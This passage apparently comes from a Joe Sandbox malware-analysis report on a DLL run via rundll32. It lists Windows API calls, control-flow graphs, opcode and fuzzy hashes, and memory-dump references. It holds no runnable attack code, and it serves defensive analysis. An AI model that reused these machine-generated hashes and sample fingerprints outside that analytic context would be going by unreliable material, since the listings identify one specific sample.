                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 7f7c068782a6bb0bfc57dee8f7e183d41ed256b16a2d9c931ac68d819aa02afb
                              • Instruction ID: ec92878d92624dcbcfe47788f986a5f49cfb98f9f47745a77b7e1c39743c0d46
                              • Opcode Fuzzy Hash: 7f7c068782a6bb0bfc57dee8f7e183d41ed256b16a2d9c931ac68d819aa02afb
                              • Instruction Fuzzy Hash: AD51BEB4680345AFEB24EF68C58875E77E1EFC8318F548529E8058B281DB79FC85CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetUserDefaultUILanguage.KERNEL32(00000000,04A4E8BF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,04A4E946,00000000,?,00000105), ref: 04A4E853
                              • GetSystemDefaultUILanguage.KERNEL32(00000000,04A4E8BF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,04A4E946,00000000,?,00000105), ref: 04A4E87B
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: DefaultLanguage$SystemUser
                              • String ID:
                              • API String ID: 384301227-0
                              • Opcode ID: 22adff89379ecbe37d201288c14f0f2ff5c02de3ec069e681dfc6e39ca1e9996
                              • Instruction ID: 0ec32de95f7493a2216770b65c629ab15cbd4e66f7841a61d19e6e5062da3bd9
                              • Opcode Fuzzy Hash: 22adff89379ecbe37d201288c14f0f2ff5c02de3ec069e681dfc6e39ca1e9996
                              • Instruction Fuzzy Hash: 0231F870E00219AFEF14EF98C980AAEB7B5FFC8318F504465D410A7250DBB4BE81CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,04A4E986,?,04A40000,04C91C1C), ref: 04A4E908
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,04A4E986,?,04A40000,04C91C1C), ref: 04A4E959
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: FileLibraryLoadModuleName
                              • String ID:
                              • API String ID: 1159719554-0
                              • Opcode ID: 318c956f2488e18ceb764668d79b9850397cb2137b191ca6726617c9c3b50af1
                              • Instruction ID: b757aa410005aff81c2e3de982122d27df4052a7ed1be32204675c70dcd869c3
                              • Opcode Fuzzy Hash: 318c956f2488e18ceb764668d79b9850397cb2137b191ca6726617c9c3b50af1
                              • Instruction Fuzzy Hash: 0C11A770A4021CABEB14EFA4CD85BDEB3B8EBC4704F5104B5A508A3291DB747F84CEA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 226 4a4d658-4a4d666 227 4a4d693-4a4d69e 226->227 228 4a4d668-4a4d67f GetModuleFileNameW call 4a4e8cc 226->228 230 4a4d684-4a4d68b 228->230 230->227 231 4a4d68d-4a4d690 230->231 231->227
                              APIs
                              • GetModuleFileNameW.KERNEL32(04A40000,?,0000020A), ref: 04A4D676
                                • Part of subcall function 04A4E8CC: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,04A4E986,?,04A40000,04C91C1C), ref: 04A4E908
                                • Part of subcall function 04A4E8CC: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,04A4E986,?,04A40000,04C91C1C), ref: 04A4E959
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: FileModuleName$LibraryLoad
                              • String ID:
                              • API String ID: 4113206344-0
                              • Opcode ID: 53da31fff64a53f6825a8500a7483ba432167d46bc4a034368a05d7b6de3c32f
                              • Instruction ID: a9fe95f003a0ff9cb4aec0162f2a4689a0f645e4ed87b77dc7d77ae79f1ae4cf
                              • Opcode Fuzzy Hash: 53da31fff64a53f6825a8500a7483ba432167d46bc4a034368a05d7b6de3c32f
                              • Instruction Fuzzy Hash: 88E0ED71A013109BDF50DF5CC9C4A4A77D4AB88754F0449A1AD18CF246D375E914C7D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 233 4a45694-4a456b2 call 4a45628 VirtualAlloc 236 4a456b4-4a45701 233->236 237 4a45702-4a4570d 233->237
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,04A45CAB), ref: 04A456AB
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 6e1bff81a3de78f41d7f07ad225b94cb4c22242480eb03d97e9b1c53fd46200a
                              • Instruction ID: 750a240c39a8bd458b465188a8dc49262a42637a0bf2cbb9c13dbfb83b299636
                              • Opcode Fuzzy Hash: 6e1bff81a3de78f41d7f07ad225b94cb4c22242480eb03d97e9b1c53fd46200a
                              • Instruction Fuzzy Hash: FFF08CF2F413416BE7189F789A48746BBD4E788354F10413EEA49DB684DBB99C008B94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 347 4a4dfd8-4a4dffe GetModuleHandleW 348 4a4e000-4a4e00f GetProcAddress 347->348 349 4a4e03d-4a4e044 347->349 348->349 350 4a4e011-4a4e025 348->350 351 4a4e046-4a4e04e 349->351 352 4a4e081-4a4e084 349->352 350->349 361 4a4e027-4a4e038 call 4a4d9fc 350->361 354 4a4e054-4a4e065 call 4a4dfb4 351->354 355 4a4e18e-4a4e197 351->355 353 4a4e087-4a4e08e 352->353 356 4a4e090 353->356 357 4a4e093-4a4e09b 353->357 354->355 365 4a4e06b-4a4e079 call 4a4dfb4 354->365 356->357 357->355 360 4a4e0a1-4a4e0b1 call 4a4d9fc 357->360 369 4a4e173-4a4e177 360->369 361->355 365->355 371 4a4e07f 365->371 372 4a4e0b6-4a4e0c6 call 4a4dfb4 369->372 373 4a4e17d-4a4e189 call 4a4d9fc 369->373 371->353 377 4a4e0c8 372->377 378 4a4e0cb-4a4e0d3 372->378 373->355 377->378 378->355 379 4a4e0d9-4a4e0eb 378->379 380 4a4e0f0-4a4e112 call 4a4d9fc FindFirstFileW 379->380 381 4a4e0ed 379->381 380->355 384 4a4e114-4a4e134 FindClose lstrlenW 380->384 381->380 384->355 385 4a4e136-4a4e171 call 4a4d9fc lstrlenW 384->385 385->369
                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 04A4DFF5
                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 04A4E006
                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 04A4E106
                              • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 04A4E118
                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 04A4E124
                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 04A4E169
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                              • String ID: GetLongPathNameW$\$kernel32.dll
                              • API String ID: 1930782624-3908791685
                              • Opcode ID: 843f5007314304cd82f3e3f5739f8d5c7410ae2bf5f10b8e104ad1236c4cac52
                              • Instruction ID: c24a5a0ceba65975c8e1581c65ec1edc75e1c350d4c394b5b08b1bc0fc8512f6
                              • Opcode Fuzzy Hash: 843f5007314304cd82f3e3f5739f8d5c7410ae2bf5f10b8e104ad1236c4cac52
                              • Instruction Fuzzy Hash: 23419031E40618ABEB20EFA8CD84ADEB3B6BFC4314F1485A58504E7680E774BE45CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindowLongW.USER32(?,000000EC), ref: 04C2A98E
                              • IsIconic.USER32(?), ref: 04C2A9BC
                              • IsWindowVisible.USER32(?), ref: 04C2A9CC
                              • ShowWindow.USER32(?,00000000,00000000,?,?,?,04C37CEF,?,04CA01D8), ref: 04C2A9E9
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 04C2A9FC
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 04C2AA0D
                              • ShowWindow.USER32(?,00000006,00000000,?,?,?,04C37CEF,?,04CA01D8), ref: 04C2AA2D
                              • ShowWindow.USER32(?,00000005,00000000,?,?,?,04C37CEF,?,04CA01D8), ref: 04C2AA37
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Window$LongShow$IconicVisible
                              • String ID:
                              • API String ID: 3484284227-0
                              • Opcode ID: 243891d753c0975f997e18be28a9f90e1d9aaccac462d16797a3c9dadb621813
                              • Instruction ID: 3e54994e3912779202874a07b53290d74aa02e5973deb2c65b65abca655a9d72
                              • Opcode Fuzzy Hash: 243891d753c0975f997e18be28a9f90e1d9aaccac462d16797a3c9dadb621813
                              • Instruction Fuzzy Hash: DD11EB0254E6F078E72276260F01FAF1D968FD3319F184975FCD4920E2C27BA2499626
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • IsValidLocale.KERNEL32(?,00000002,00000000,04A4DCE1,?,?,?,00000000), ref: 04A4DC26
                              • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,04A4DCE1,?,?,?,00000000), ref: 04A4DC42
                              • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,04A4DCE1,?,?,?,00000000), ref: 04A4DC53
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Locale$Info$Valid
                              • String ID:
                              • API String ID: 1826331170-0
                              • Opcode ID: 3c7ea2d6d8f6307f32a437f3ff9122e2f220dbe44ca31b64d180e914483d05ad
                              • Instruction ID: 1c5370d1d87d9d672b9b66e594ab6d013eac950c117bc4e0b94fe53353b37c7c
                              • Opcode Fuzzy Hash: 3c7ea2d6d8f6307f32a437f3ff9122e2f220dbe44ca31b64d180e914483d05ad
                              • Instruction Fuzzy Hash: F9317A74A04618EFEB20DFA4DD81BEEB7B9FBC4705F5005A9A508A7250DB747E80CE61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Version
                              • String ID:
                              • API String ID: 1889659487-0
                              • Opcode ID: fd9ffbe9fcccebc8bed5f5f0c05ba749212958faa26ccf0c442d5082cf8daf9a
                              • Instruction ID: 5d0b029b731aafb00f73957a633614e66e7e4ae1724907ed45ab214da2a19e56
                              • Opcode Fuzzy Hash: fd9ffbe9fcccebc8bed5f5f0c05ba749212958faa26ccf0c442d5082cf8daf9a
                              • Instruction Fuzzy Hash: 3BD0A775D198034BDB300B54CBC43BC21D1F7C1714FE6C075C51145D55DA3D98C19101
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Iconic
                              • String ID:
                              • API String ID: 110040809-0
                              • Opcode ID: ff3d05d811ed0ebabea682255e5f3f15d697bd5d40318cd1929b755e7a2e63df
                              • Instruction ID: 040cd14e095e08f0add39401bee5a5e53996dda37486355991d02c1b43b37150
                              • Opcode Fuzzy Hash: ff3d05d811ed0ebabea682255e5f3f15d697bd5d40318cd1929b755e7a2e63df
                              • Instruction Fuzzy Hash: 43C012789002409BDF41EE29C988FC037A2F74030AFC04A90D5048B805DBBAADC4CB10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d17ffc1b7c175c9f3f133bcf490b3ef334a0cf6f2a578ee1034f9dfeca47056c
                              • Instruction ID: fc9931429a7cce44f95ff33b2e294f23b44c95ba4f9bb023cbe7015cce989db2
                              • Opcode Fuzzy Hash: d17ffc1b7c175c9f3f133bcf490b3ef334a0cf6f2a578ee1034f9dfeca47056c
                              • Instruction Fuzzy Hash: DD01C432B057110B870CDD7E8D9852EB6D3ABD8920F0AC63D958DC72C4DD318C1AC282
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
